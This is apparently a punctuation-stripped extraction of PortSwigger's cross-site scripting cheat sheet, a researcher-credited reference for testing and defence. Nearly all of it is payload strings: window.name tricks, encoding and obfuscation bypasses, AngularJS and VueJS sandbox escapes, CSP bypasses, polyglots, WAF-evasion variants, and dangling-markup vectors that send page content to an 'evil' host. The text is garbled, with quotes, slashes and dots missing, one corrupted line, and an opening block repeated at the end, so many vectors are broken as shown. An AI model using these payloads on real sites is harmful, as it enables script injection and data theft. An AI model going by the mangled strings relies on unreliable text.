Set windowname via target attribute in a ltformgt tag ltform action=httpsubdomain1portswigger-labsnetxssxssphp target=alert(1)gtltinput type=hidden name=x value=eval(name)gtltinput type=hidden name=context value=js_string_singlegtltinput type=submit value=XSS via target in a formgtltformgt
Set windowname via formtarget attribute in altinputgt tag type submit
ltformgtltinput type=hidden name=x value=eval(name)gtltinput type=hidden name=context value=js_string_singlegtltinput type=submit formaction=httpsubdomain1portswigger-labsnetxssxssphp formtarget=alert(1) value=XSS via formtarget in input type submitgtltformgt
Set windowname via formtarget attribute in altinputgt tag type image
ltformgtltinput type=hidden name=x value=eval(name)gtltinput type=hidden name=context value=js_string_singlegtltinput name=1 type=image src=validimagepng formaction=httpsubdomain1portswigger-labsnetxssxssphp formtarget=alert(1) value=XSS via formtarget in input type imagegtltformgt
Special tags
Redirect to a different domain ltmeta http-equiv=refresh content=0 url=portswigger-labsnetgt
Meta charset attribute UTF-7 ltmeta charset=UTF-7 gt +ADw-script+AD4-alert(1)+ADw-script+AD4-
Meta charset UTF-7 ltmeta http-equiv=Content-Type content=texthtml charset=UTF-7 gt +ADw-script+AD4-alert(1)+ADw-script+AD4-
UTF-7 BOM characters (Has to be at the start of thedocument) 1
+v8 +ADw-script+AD4-alert(1)+ADw-script+AD4-
UTF-7 BOM characters (Has to be at the start of thedocument) 2
+v9 +ADw-script+AD4-alert(1)+ADw-script+AD4-
UTF-7 BOM characters (Has to be at the start of thedocument) 3
+v+ +ADw-script+AD4-alert(1)+ADw-script+AD4-
UTF-7 BOM characters (Has to be at the start of thedocument) 4
+v +ADw-script+AD4-alert(1)+ADw-script+AD4-
Upgrade insecure requests ltmeta http-equiv=Content-Security-Policy content=upgrade-insecure-requestsgt
Disable JavaScript via iframe sandbox ltiframe sandbox src=portswigger-labsnetgtltiframegt
Disable referer ltmeta name=referrer content=no-referrergt
Encoding
Overlong UTF-8 C0BCscriptgtalert(1)ltscriptgt E080BCscriptgtalert(1)ltscriptgt F08080BCscriptgtalert(1)ltscriptgt F8808080BCscriptgtalert(1)ltscriptgt FC80808080BCscriptgtalert(1)ltscriptgt
Unicode escapes ltscriptgtu0061lert(1)ltscriptgt
Unicode escapes ES6 style ltscriptgtu61lert(1)ltscriptgt
Unicode escapes ES6 style zero padded ltscriptgtu0000000061lert(1)ltscriptgt
Hex encoding JavaScript escapes ltscriptgteval(x61lert(1))ltscriptgt
Octal encoding ltscriptgteval(141lert(1))ltscriptgt ltscriptgteval(alert(061))ltscriptgt ltscriptgteval(alert(61))ltscriptgt
Decimal encoding with optional semi-colon lta href=amp106avascriptalert(1)gtXSSltagtlta href=amp106avascriptalert(1)gtXSSltagt
SVG script with HTML encoding ltsvggtltscriptgtamp97lert(1)ltscriptgtltsvggt ltsvggtltscriptgtampx61lert(1)ltscriptgtltsvggt ltsvggtltscriptgtalertampNewLine(1)ltscriptgtltsvggt ltsvggtltscriptgtx=ampquotalert(1)ltscriptgtltsvggt
Decimal encoding with padded zeros lta href=amp0000106avascriptalert(1)gtXSSltagt
Hex encoding entities lta href=ampx6aavascriptalert(1)gtXSSltagt
Hex encoding without semi-colon provided nextcharacter is not a-f0-9
lta href=jampx61vascriptalert(1)gtXSSltagt lta href=ampx6a avascriptalert(1)gtXSSltagt lta href=ampx6a avascriptalert(1)gtXSSltagt
Hex encoding with padded zeros lta href=ampx0000006aavascriptalert(1)gtXSSltagt
Hex encoding is not case sensitive lta href=ampX6Aavascriptalert(1)gtXSSltagt
HTML entities lta href=javascriptampcolonalert(1)gtXSSltagt lta href=javaampTabscriptalert(1)gtXSSltagt lta href=javaampNewLinescriptalert(1)gtXSSltagt lta href=javascriptampcolonalertamplpar1amprpargtXSSltagt
URL encoding lta href=javascriptx=27-alert(1)-27gtXSSltagt
HTML entities and URL encoding lta href=javascriptx=amppercnt27-alert(1)-27gtXSSltagt
Obfuscation
Data protocol inside script src with base64 ltscript src=datatextjavascriptbase64YWxlcnQoMSk=gtltscriptgt
Data protocol inside script src with base64 andHTML entities
ltscript src=datatextjavascriptbase64ampx59ampx57ampx78ampx6campx63ampx6eampx51ampx6fampx4dampx53ampx6bampx3dgtltscriptgt
Data protocol inside script src with base64 and URLencoding
ltscript src=datatextjavascriptbase645957786c636e516f4d536b3dgtltscriptgt
Iframe srcdoc HTML encoded ltiframe srcdoc=ampltscriptampgtalertamplpar1amprparampltampsolscriptampgtgtltiframegt
Iframe JavaScript URL with HTML and URL encoding ltiframe src=javascriptampx25ampx33ampx43ampx73ampx63ampx72ampx69ampx70ampx74ampx25ampx33ampx45ampx61ampx6campx65ampx72ampx74ampx28ampx31ampx29ampx25ampx33ampx43ampx25ampx32ampx46ampx73ampx63ampx72ampx69ampx70ampx74ampx25ampx33ampx45gtltiframegt
SVG script with unicode escapes and HTMLencoding
ltsvggtltscriptgtampx5campx75ampx30ampx30ampx36ampx31ampx5campx75ampx30ampx30ampx36ampx63ampx5campx75ampx30ampx30ampx36ampx35ampx5campx75ampx30ampx30ampx37ampx32ampx5campx75ampx30ampx30ampx37ampx34(1)ltscriptgtltsvggt
Client-side template injection
VueJS reflected
Version Author Length Vector
All versions Mario Heiderich (Cure53) 41 constructorconstructor(alert(1))()
All versions Mario Heiderich (Cure53) ampSebastian Lekies (Google)Eduardo Vela Nava (Google)Krzysztof Kotowicz (Google)
62 ltdiv v-html=constructorconstructor(alert(1))()gtaltdivgt
All versions Gareth Heyes (PortSwigger) 39 ltx v-html=_cconstructor(alert(1))()gt
All versions Peter af Geijerstam (SwedishShellcode Factory)
37 ltx v-if=_cconstructor(alert(1))()gt
AngularJS sandbox escapes reflected
Version Author Length Vector
101 - 115 Mario Heiderich (Cure53) 41 constructorconstructor(alert(1))()
101 - 115(shorter)
Gareth Heyes (PortSwigger) ampLewis Ardern (Synopsys)
33 $onconstructor(alert(1))()
120 - 121 Jan Horn (Google) 122 a=constructorb=asubcallcall(b[a]getOwnPropertyDescriptor(b[a]getPrototypeOf(asub)a)value0alert(1))()
122 - 125 Gareth Heyes (PortSwigger) 23 )))alert(1)
126 - 1218 Jan Horn (Google) 106 (_=sub)callcall([$=constructor]getOwnPropertyDescriptor(___proto__$)value0alert(1))()
1219 - 1223 Mathias Karlsson (Detectify) 124 toStringconstructorprototypetoString=toStringconstructorprototypecall[aalert(1)]sort(toStringconstructor)
1224 - 1229 Gareth Heyes (PortSwigger) 23 )))alert(1)
1227-1229130-1320
Gareth Heyes (PortSwigger) 23 )))alert(1)
130 Gaacutebor Molnaacuter (Google) 272 ready ampamp (ready = true) ampamp ( call $$watchers[0]get(toStringconstructorprototype) (a = apply) ampamp (apply = constructor) ampamp (valueOf = call) ampamp (+toString( F = Functionprototype + Fapply = Fa + delete Fa + delete FvalueOf + alert(1) )))
133 - 1318 Gareth Heyes (PortSwigger) 128 [toString[]joinlength10__proto__]assign=[]joinaconstructorprototypecharAt=
[]join$eval(x=alert(1))
1319 Gareth Heyes (PortSwigger) 102 a[toStringfalsevalueOf[]joinlength10__proto__]charAt=[]join$eval(x=alert(1))
1320 Gareth Heyes (PortSwigger) 65 aconstructorprototypecharAt=[]join$eval(x=alert(1))
140 - 149 Gareth Heyes (PortSwigger) 74 aconstructorprototypecharAt=[]join$eval(x=1 alert(1))
150 - 158 Ian Hickey amp Gareth Heyes(PortSwigger)
79 x=yconstructorprototypex[y]charAt=[]join$eval(x=alert(1))
159 - 1511 Jan Horn (Google) 517 c=subcallb=subbinda=subapply c$apply=$applyc$eval=bop=$root$$phase $root$$phase=nullod=$root$digest$root$digest=()toString C=c$apply(c)$root$$phase=op$root$digest=od B=C(bcb)$evalAsync( astNode=pop()astNodetype=UnaryExpression astNodeoperator=(windowXvoid0(windowX=truealert(1)))+ astNodeargument=typeIdentifiernamefoo ) m1=B($$asyncQueuepop()expressionnull$root) m2=B(Cnullm1)[]pushapply=m2a=sub $eval(a(bc))[]pushapply=a
gt=160 Mario Heiderich (Cure53) 41 constructorconstructor(alert(1))()
gt=160 (shorter) Gareth Heyes (PortSwigger) ampLewis Ardern (Synopsys)
33 $onconstructor(alert(1))()
DOM based AngularJS sandbox escapes (Using orderBy or no $eval)
Version Author Length Vector
101 - 115 Mario Heiderich (Cure53) 37 constructorconstructor(alert(1))()
120 - 1218 Jan Horn (Google) 118 a=constructorb=asubcallcall(b[a]getOwnPropertyDescriptor(b[a]getPrototypeOf(asub)a)value0alert(1))()
1219 - 1223 Mathias Karlsson (Detectify) 119 toStringconstructorprototypetoString=toStringconstructorprototypecall[aalert(1)]sort(toStringconstructor)
1224 - 1226 Gareth Heyes (PortSwigger) 317 [[__proto__]][x]=constructorgetOwnPropertyDescriptorg=[[__proto__]][x][[__proto__]][y]=g(sub[[__proto__]]constructor)[[__proto__]][z]=constructordefinePropertyd=[[__proto__]][z]d(sub[[__proto__]]constructorvaluefalse)[[__proto__]][y]value(alert(1))()
1227-1229130-1320
Gareth Heyes (PortSwigger) 20 )))alert(1)
140-145 Gareth Heyes (PortSwigger) 75 aconstructorprototypecharAt=[]join[1]|orderByx=1 alert(1)
gt=160 Mario Heiderich (Cure53) 37 constructorconstructor(alert(1))()
144 (withoutstrings)
Gareth Heyes (PortSwigger) 134 toString()constructorprototypecharAt=[]join [12]|orderBytoString()constructorfromCharCode(1206197108101114116404941)
AngularJS CSP bypasses
Version Author Length Vector
All versions(Chrome)
Gareth Heyes (PortSwigger) 81 ltinput autofocus ng-focus=$eventpath|orderBy[]constructorfrom([1]alert)gt
All versions(Chrome)shorter
Gareth Heyes (PortSwigger) 56 ltinput id=x ng-focus=$eventpath|orderBy(z=alert)(1)gt
All versions (allbrowsers)shorter
Gareth Heyes (PortSwigger) 91 ltinput autofocus ng-focus=$eventcomposedPath()|orderBy[]constructorfrom([1]alert)gt
120 - 150 Eduardo Vela (Google) 190 ltdiv ng-app ng-cspgtltdiv ng-focus=x=$event id=f tabindex=0gtfooltdivgtltdiv ng-repeat=(key value) in xviewgtltdiv ng-if=key == windowgt [1]reduce(valuealert 1) ltdivgtltdivgtltdivgt
All versions(Chrome)shorter via oncut
Savan Gadhiya(NotSoSecure)
49 ltinput ng-cut=$eventpath|orderBy(y=alert)(1)gt
Scriptless attacks
Dangling markup
Background attribute ltbody background=evil lttable background=evil lttablegtltthead background=evil lttablegtlttbody background=evil lttablegtlttfoot background=evil lttablegtlttd background=evil lttablegtltth background=evil
Link href stylesheet ltlink rel=stylesheet href=evil
Link href icon ltlink rel=icon href=evil
Meta refresh ltmeta http-equiv=refresh content=0 httpevil
Img to pass markup through src attribute ltimg src=evil ltimage src=evil
Video using track element ltvideogtlttrack default src=evil
Video using source element and src attribute ltvideogtltsource src=evil
Audio using source element and src attribute ltaudiogtltsource src=evil
Input src ltinput type=image src=evil
Button using formaction ltformgtltbutton style=width100height100 type=submit formaction=evil
Input using formaction ltformgtltinput type=submit value=XSS style=width100height100 type=submit formaction=evil
Form using action ltbutton form=x style=width100height100gtltform id=x action=evil
Object data ltobject data=evil
Iframe src ltiframe src=evil
Embed src ltembed src=evil
Embed src ltembed src evil
Use textarea to consume markup and post toexternal site
ltformgtltbutton formaction=evilgtXSSltbuttongtlttextarea name=xgt
Pass markup data through windowname using formtarget
ltbutton form=xgtXSSltbuttongtltform id=x action=evil target=
Pass markup data through windowname using basetarget
lta href=httpsubdomain1portswigger-labsnetdangling_markupnamehtmlgtltfont size=100 color=redgtYou must click meltfontgtltagtltbase target=
Pass markup data through windowname usingformtarget
ltformgtltinput type=submit value=Click me formaction=httpsubdomain1portswigger-labsnetdangling_markupnamehtml formtarget=
Using base href to pass data lta href=abc style=width100height100positionabsolutefont-size1000pxgtxssltbase href=evil
Using embed window name to pass data from thepage
ltembed src=httpsubdomain1portswigger-labsnetdangling_markupnamehtml name=
Using iframe window name to pass data from thepage
ltiframe src=httpsubdomain1portswigger-labsnetdangling_markupnamehtml name=
Using object window name to pass data from thepage
ltobject data=httpsubdomain1portswigger-labsnetdangling_markupnamehtml name=
Using frame window name to pass data from thepage
ltframesetgtltframe src=httpsubdomain1portswigger-labsnetdangling_markupnamehtml name=
Overwrite type attribute with image in hidden inputs ltinput type=hidden type=image src=evil
Polyglots
Polyglot payload 1 javascript--gtlttitlegtltstylegtlttextareagtltscriptgtltxmpgtltsvgonload=++onmouseover=1+[[]+alert(1)gt
Polyglot payload 2 javascript`--gtltnoscriptgtlttitlegtlttextareagtltstylegtlttemplategtltnoembedgtltscriptgtlthtml onmouseover=ampltsvgonload=alert()gt
Polyglot payload 3 javascript--gtlttitlegtltstylegtlttextareagtltscriptgtltxmpgtltdetailsopenontoggle=+`++onmouseover=1+[[]+alert(PortSwiggerRes)gt
WAF bypass global objects
XSS into a JavaScript string string concatenation(window)
window[ale+rt](window[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(self)
self[ale+rt](self[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(this)
this[ale+rt](this[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(top)
top[ale+rt](top[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(parent)
parent[ale+rt](parent[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(frames)
frames[ale+rt](frames[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(globalThis)
globalThis[ale+rt](globalThis[doc+ument][dom+ain])
XSS into a JavaScript string comment syntax(window)
window[fooalertbar](window[foodocumentbar][domain])
XSS into a JavaScript string comment syntax (self) self[fooalertbar](self[foodocumentbar][domain])
XSS into a JavaScript string comment syntax (this) this[fooalertbar](this[foodocumentbar][domain])
XSS into a JavaScript string comment syntax (top) top[fooalertbar](top[foodocumentbar][domain])
XSS into a JavaScript string comment syntax(parent)
parent[fooalertbar](parent[foodocumentbar][domain])
XSS into a JavaScript string comment syntax(frames)
frames[fooalertbar](frames[foodocumentbar][domain])
XSS into a JavaScript string comment syntax(globalThis)
globalThis[fooalertbar](globalThis[foodocumentbar][domain])
XSS into a JavaScript string hex escape sequence(window)
window[x61x6cx65x72x74](window[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(self)
self[x61x6cx65x72x74](self[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(this)
this[x61x6cx65x72x74](this[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(top)
top[x61x6cx65x72x74](top[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(parent)
parent[x61x6cx65x72x74](parent[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(frames)
frames[x61x6cx65x72x74](frames[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(globalThis)
globalThis[x61x6cx65x72x74](globalThis[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequenceand base64 encoded string (window)
window[x65x76x61x6c](window[x61x6cx65x72x74](window[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (self)
self[x65x76x61x6c](self[x61x6cx65x72x74](self[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (this)
this[x65x76x61x6c](this[x61x6cx65x72x74](this[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (top)
top[x65x76x61x6c](top[x61x6cx65x72x74](top[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (parent)
parent[x65x76x61x6c](parent[x61x6cx65x72x74](parent[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (frames)
frames[x65x76x61x6c](frames[x61x6cx65x72x74](frames[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequence globalThis[x65x76x61x6c](globalThis[x61x6cx65x72x74]
XSS into a JavaScript string hex escape sequence
and base64 encoded string (globalThis) (globalThis[x61x74x6fx62](WFNT)))
XSS into a JavaScript string octal escape sequence(window)
window[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(self)
self[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(this)
this[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(top)
top[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(parent)
parent[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(frames)
frames[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(globalThis)
globalThis[141154145162164](130123123)
XSS into a JavaScript string unicode escape(window)
window[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape (self) self[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape (this) this[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape (top) top[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape(parent)
parent[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape(frames)
frames[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape(globalThis)
globalThis[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string RegExp sourceproperty (window)
window[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (self)
self[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (this)
this[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (top)
top[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (parent)
parent[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (frames)
frames[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (globalThis)
globalThis[alsource+ertsource](XSSsource)
XSS into a JavaScript string HieroglyphyJSFuck(window)
window[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(self)
self[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(this)
this[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(top)
top[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(parent)
parent[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(frames)
frames[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(globalThis)
globalThis[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
Impossible labs
Classic vectors (XSS crypt)
Image src with JavaScript protocol ltimg src=javascriptalert(1)gt
Body background with JavaScript protocol ltbody background=javascriptalert(1)gt
Iframe data urls no longer work as modern browsersuse a null origin
ltiframe src=datatexthtmlltimg src=1 onerror=alert(documentdomain)gtgt
Title Description Lengthlimit
Closest vector Link
Basic context WAFblocks lt[a-zA-Z]
This lab captures the scenario when you cant use an open tag followed by an alphanumericcharacter Sometimes you can solve this problem by bypassing the WAF entirely but whatabout when thats not an option Certain versions of NET have this behaviour and its onlyknown to be exploitable in old IE with lttag
NA NA 128279
Script based injectionbut quotes forwardslash and backslash areescaped
We often encounter this situation in the wild you have an injection inside a JavaScript variableand can inject angle brackets but quotes and forwardbackslashes are escaped so you cantsimply close the script block
The closest weve got to solving this is when you have multiple injection points The first withina script based context and the second in HTML
NA NA 128279
innerHTML context butno equals allowed
You have a site that processes the query string and URL decodes the parameters but splits onthe equals then assigns to innerHTML In this context ltscriptgt doesnt work and we cant use =to create an event
NA NA 128279
Basic context lengthlimit
This labs injection occurs within the basic HTML context but has a length limitation of 15Filedescriptor came up with a vector that could execute JavaScript in 16 characters ltqoncut=alert`` but can you beat it
15 ltq oncut=alert`` 128279
Attribute context lengthlimit
The context of this lab inside an attribute with a length limitation of 14 characters We came upwith a vector that executes JavaScript in 15 charactersoncut=alert``+ the plus is a trailingspace Do you think you can beat it
14 oncut=alert`` 128279
Basic context lengthlimit arbitrary code
Its all well and good executing JavaScript but if all you can do is call alert what use is that Inthis lab we demonstrate the shortest possible way to execute arbitrary code
19 ltqoncut=eval(name)
128279
Attribute context lengthlimit arbitrary code
Again calling alert proves you can call a function but we created another lab to find theshortest possible attribute based injection with arbitrary JavaScript
17 See link 128279
Injection occurs inside aframeset but before thebody
We received a request from twitter about this next lab It occurs within a frameset but before abody tag with equals filtered You would think you could inject a closing frameset followed by ascript block but that would be too easy
NA NA 128279
Injection occurs insidesingle quoted stringonly characters a-z0-9+` are allowed
The injection occurs within a single quoted string and the challenge is to execute arbitrarycode using the charset a-zA-Z0-9+`
NA NA 128279
VBScript protocol used to work in IE lta href=vbscriptMsgBox+1gtXSSltagt lta href= onclick=vbsMsgbox+1gtXSSltagt lta href= onclick=VBSMsgbox+1gtXSSltagt lta href= onclick=vbscriptMsgbox+1gtXSSltagt lta href= onclick=VBSCRIPTMsgbox+1gtXSSltagt lta href= language=vbs onclick=vbscriptMsgbox+1gtXSSltagt
JScript compact was a minimal version of JS thatwasnt widely used in IE
lta href= onclick=jscriptcompactalert(1)gttestltagt lta href= onclick=JSCRIPTCOMPACTalert(1)gttestltagt
JScriptEncode allows encoded JavaScript lta href= language=JScriptEncode onclick=~^CAAAAA==C^+D`8mgIAAA==^~gtXSSltagt lta href= onclick=JScriptEncode~^CAAAAA==C^+D`8mgIAAA==^~gtXSSltagt
VBScriptEncoded allows encoded VBScript ltiframe onload=VBScriptEncode~^CAAAAA==ko$K6FoQIAAA==^~gt ltiframe language=VBScriptEncode onload=~^CAAAAA==ko$K6FoQIAAA==^~gt
JavaScript entities used to work in NetscapeNavigator
lta title=ampalert(1)gtXSSltagt
JavaScript stylesheets used to be supported byNetscape Navigator
ltlink href=xssjs rel=stylesheet type=textjavascriptgt
Button used to consume markup ltformgtltbutton name=x formaction=xgtltbgtstealme
IE9 select elements and plaintext used to consumemarkup
ltform action=xgtltbuttongtXSSltbuttongtltselect name=xgtltoptiongtltplaintextgtltscriptgttoken=supersecretltscriptgt
XBL Firefox only lt= 2 ltdiv style=-moz-bindingurl(businessinfocouklabsxblxblxmlxss)gt ltdiv style=-moz-bindingurl(businessinfocouklabsxblxblxmlxss)gt ltdiv style=-moz-bindin67url(businessinfocouklab sxblxblxmlxss)gt ltdiv style=-moz-bindinampx5c67url(businessinfocouklab sxblxblxmlxss)gt
XBL also worked in FF35 using data urls ltimg src=blah style=-moz-binding url(datatextxmlcharset=utf-83C3Fxml20version3D2210223F3E3Cbindings20xmlns3D22 http3Awwwmozillaorgxbl223E3Cbinding20id3D22loader223E3Cimplementation3E3Cconstructor3E3C215BCDATA5Bvar20url203D2022alertjs 223B20var20scr203D20documentcreateElement2822script22293B20scrsetAttribute2822src222Curl293B20var20bodyElement203D20 documentgetElementsByTagName2822html2229item280293B20bodyElementappendChild28scr293B205D5D3E3Cconstructor3E3Cimplementation3E3C binding3E3Cbindings3E) gt
CSS expressions lt=IE7 ltdiv style=xssexpression(alert(1))gt ltdiv style=xssexpression(1)-alert(1)gt ltdiv style=xssexpressio6e(alert(1))gt ltdiv style=xssexpressio006e(alert(1))gt ltdiv style=xssexpressio00006e(alert(1))gt ltdiv style=xssexpressio6e(alert(1))gt ltdiv style=xssexpressioampx5c6e(alert(1))gt
In quirks mode IE allowed you to use = instead of ltdiv style=xss=expression(alert(1))gt ltdiv style=colorampx3dredgttestltdivgt
Behaviors for older modes of IE lta style=behaviorurl(defaultAnchorClick) folder=javascriptalert(1)gtXSSltagt
Older versions of IE supported event handlers infunctions
ltscriptgt function windowonload() alert(1) ltscriptgt ltscriptgt function windowonload() alert(1) ltscriptgt ltscriptgt function windowlocation() ltscriptgt ltbodygt ltscriptgt functionltimg src=1 onerror=alert(1)gtdocumentbodyinnerHTML() ltscriptgt ltbodygt ltbodygt
y
ltscriptgt function documentbodyinnerHTML() x = ltimg src=1 onerror=alert(1)gt ltscriptgt ltbodygt
GreyMagic HTML+time exploit (no longer workseven in 5 docmode)
ltHTMLgtltBODYgtltxmlnamespace prefix=t ns=urnschemas-microsoft-comtimegtltimport namespace=t implementation=defaulttime2gtlttset attributeName=innerHTML to=XSSltimg src=1 onerror=alert(1)gtgt ltBODYgtltHTMLgt
Firefox allows NULLS after amp lta href=javascriptampx6aavascriptalert(1)gtFirefoxltagt
Firefox allows NULLs inside named entities lta href=javascriptampcolonalert(1)gtFirefoxltagt
Firefox allows NULL characters inside openingcomments
lt-- gtltimg title=--gtltiframeonload=alert(1)gtgt --gt lt-- gtltimg title=--gtltiframeonload=alert(1)gtgt --gt
Safari used to allow any tag to have a onload eventinside SVG
ltsvggtltxss onload=alert(1)gt
Isindex using src attribute ltisindex type=image src=evil
Isindex using submit ltisindex type=submit style=width100height100 value=XSS formaction=evil
Isindex and formaction ltisindex type=submit formaction=javascriptalert(1)gt
Isindex and action ltisindex type=submit action=javascriptalert(1)gt
CreditsBrought to you by PortSwigger lovingly constructed by Gareth Heyes
This cheat sheet wouldnt be possible without the web security community who share their research Big thanks to James Kettle Mario Heiderich EduardoVela Masato Kinugawa Filedescriptor LeverOne Ben Hayak Alex Infuumlhr Mathias Karlsson Jan Horn Ian Hickey Gaacutebor Molnaacuter tsetnep Psych0tr1aSkyphire Abdulrhman Alqabandi brainpillow Kyo Yosuke Hasegawa White Jordan Algol jackmasa wpulog Bolk Robert Hansen David LindsaySuperhei Michal Zalewski Renaud Lifchitz Roman Ivanov Frederik Braun Krzysztof Kotowicz Giorgio Maone GreyMagic Marcus Niemietz SoroushDalili Stefano Di Paola Roman Shafigullin Lewis Ardern Michał Bentkowski SOslashᴘᴀS avanish46 Juuso Kaumlenmaumlki jinmo123 itszn13 Martin Bajanik DavidGranqvist Andrea (theMiddle) Menin simps0n hahwul Paweł Hałdrzyński Jun Kokatsu RenwaX23 sratarun har1sec Yann C gadhiyasavan p4fgdiofeher
You can contribute to this cheat sheet by creating a new issue or updating the JSON and creating a pull request
Set do a e a a e att bute a a e
tagcontext=js_string_singleampx=27eval(name)gtltiframegt
Set windowname via target attribute in a ltbasegt tag ltbase target=alert(1)gtlta href=httpsubdomain1portswigger-labsnetxssxssphpcontext=js_string_singleampx=27eval(name)gtXSS via target in base tagltagt
Set windowname via target attribute in a ltagt tag lta target=alert(1) href=httpsubdomain1portswigger-labsnetxssxssphpcontext=js_string_singleampx=27eval(name)gtXSS via target in a tagltagt
Set windowname via usemap attribute in a ltimggttag
ltimg src=validimagepng width=10 height=10 usemap=xssgtltmap name=xssgtltarea shape=rect coords=0082126 target=alert(1) href=httpsubdomain1portswigger-labsnetxssxssphpcontext=js_string_singleampx=27eval(name)gtltmapgt
Set windowname via target attribute in a ltformgt tag ltform action=httpsubdomain1portswigger-labsnetxssxssphp target=alert(1)gtltinput type=hidden name=x value=eval(name)gtltinput type=hidden name=context value=js_string_singlegtltinput type=submit value=XSS via target in a formgtltformgt
Set windowname via formtarget attribute in altinputgt tag type submit
ltformgtltinput type=hidden name=x value=eval(name)gtltinput type=hidden name=context value=js_string_singlegtltinput type=submit formaction=httpsubdomain1portswigger-labsnetxssxssphp formtarget=alert(1) value=XSS via formtarget in input type submitgtltformgt
Set windowname via formtarget attribute in altinputgt tag type image
ltformgtltinput type=hidden name=x value=eval(name)gtltinput type=hidden name=context value=js_string_singlegtltinput name=1 type=image src=validimagepng formaction=httpsubdomain1portswigger-labsnetxssxssphp formtarget=alert(1) value=XSS via formtarget in input type imagegtltformgt
Special tags
Redirect to a different domain ltmeta http-equiv=refresh content=0 url=portswigger-labsnetgt
Meta charset attribute UTF-7 ltmeta charset=UTF-7 gt +ADw-script+AD4-alert(1)+ADw-script+AD4-
Meta charset UTF-7 ltmeta http-equiv=Content-Type content=texthtml charset=UTF-7 gt +ADw-script+AD4-alert(1)+ADw-script+AD4-
UTF-7 BOM characters (Has to be at the start of thedocument) 1
+v8 +ADw-script+AD4-alert(1)+ADw-script+AD4-
UTF-7 BOM characters (Has to be at the start of thedocument) 2
+v9 +ADw-script+AD4-alert(1)+ADw-script+AD4-
UTF-7 BOM characters (Has to be at the start of thedocument) 3
+v+ +ADw-script+AD4-alert(1)+ADw-script+AD4-
UTF-7 BOM characters (Has to be at the start of thedocument) 4
+v +ADw-script+AD4-alert(1)+ADw-script+AD4-
Upgrade insecure requests ltmeta http-equiv=Content-Security-Policy content=upgrade-insecure-requestsgt
Disable JavaScript via iframe sandbox ltiframe sandbox src=portswigger-labsnetgtltiframegt
Disable referer ltmeta name=referrer content=no-referrergt
Encoding
Overlong UTF-8 C0BCscriptgtalert(1)ltscriptgt E080BCscriptgtalert(1)ltscriptgt F08080BCscriptgtalert(1)ltscriptgt F8808080BCscriptgtalert(1)ltscriptgt FC80808080BCscriptgtalert(1)ltscriptgt
Unicode escapes ltscriptgtu0061lert(1)ltscriptgt
Unicode escapes ES6 style ltscriptgtu61lert(1)ltscriptgt
